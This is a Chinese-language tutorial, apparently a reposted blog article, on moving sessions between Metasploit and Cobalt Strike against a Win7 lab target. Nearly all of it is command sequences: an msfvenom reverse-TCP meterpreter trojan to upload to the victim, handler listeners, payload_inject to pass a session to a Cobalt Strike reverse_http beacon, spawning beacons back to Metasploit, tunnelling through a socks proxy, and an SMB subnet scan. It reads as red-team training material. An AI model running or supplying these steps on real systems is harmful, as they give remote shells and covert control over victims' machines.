192.168.100.2
- CS:监听器端口`8080`
- MSF:监听端口`9999`靶机:Win7,
场景:当MSF有了一个Session会话,利用MSF注入功能,加载CS的Payload
msfvenom
生成一个恶意木马,并上传到靶机$ msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=<MSF_IP> lport=<MSF_Port> -f exe > msf.exe
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lhost <MSF_IP>
msf6 exploit(multi/handler) > set lport <MSF_Port>
msf6 exploit(multi/handler) > exploit
- 监听器类型:`windows/beacon_http/reverse_http`
- Host修改为CS的IP,监听指定端口,等待MSF发送
# 挂起会话
meterpreter> background
# 使用payload_inject模块,执行之后会在本地产生一个新的Handler
msf> use exploit/windows/local/payload_inject
# 根据CS监听器类型选择对应的payload(http或者https)
msf> set payload windows/meterpreter/reverse_http
# 设置回连地址,CS_IP和监听器端口
msf> set LHOST <CS_IP>
msf> set LPORT <CS_Port> # 前面CS监听器端口
# 指定要执行的Session
msf> set session <Session_ID>
# 设置MSF不启动监听,不然MSF会提示执行成功,但没有会话建立
msf> set disablepayloadhandler true
msf> run
场景:CS已上线主机,想把这个主机发送给MSF,生成一个MSF的Session
# 配置监听器
msf> use exploit/multi/handler
# 选择Payload
msf> set payload windows/meterpreter/reverse_http # 不要用64位
msf> set lhost <MSF_IP>
msf> set lport <MSF_Port> # 设置任意端口进行监听
# 启动监听器
msf> run
- IP设置为MSF的外网IP
- 端口设置为MSF监听端口
Spawn
,选择MSF的监听器,或者在CS上线主机运行:beacon> Spawn msf
场景:CS已上线主机,通过CS开放一个socks代理,让MSF连接此代理进行内网渗透
beacon> socks <Proxy_Prot> # 设置任意端口进行代理
view > Proxy pirots
,点击Tunnel
,可以看到生成对应的命令setg Proxies socks4:<CS_IP>:<Proxy_Prot>
# MSF所有流量将走此代理
msf> setg Proxies socks4:<CS_IP>:<Proxy_Prot>
# 设置允许反向代理,即建立双向通道
# 如果通过此socks反弹shell,则需要开启,否则不推荐开启
msf> setg ReverseAllowProxy true
# 可以使用以下命令停止
msf> unsetg Proxies
msf> use auxiliary/scanner/smb/smb_version
msf> set rhost 192.168.100.0/24 # 靶机如果有其它网段也可以扫描
msf> set threads 10
msf> run
版权属于:Naraku
本文链接:https://cloud.tencent.com/developer/article/1853850
本站所有原创文章均采用 知识共享署名-非商业-禁止演绎4.0国际许可证 。如需转载请务必注明出处并保留原文链接,谢谢~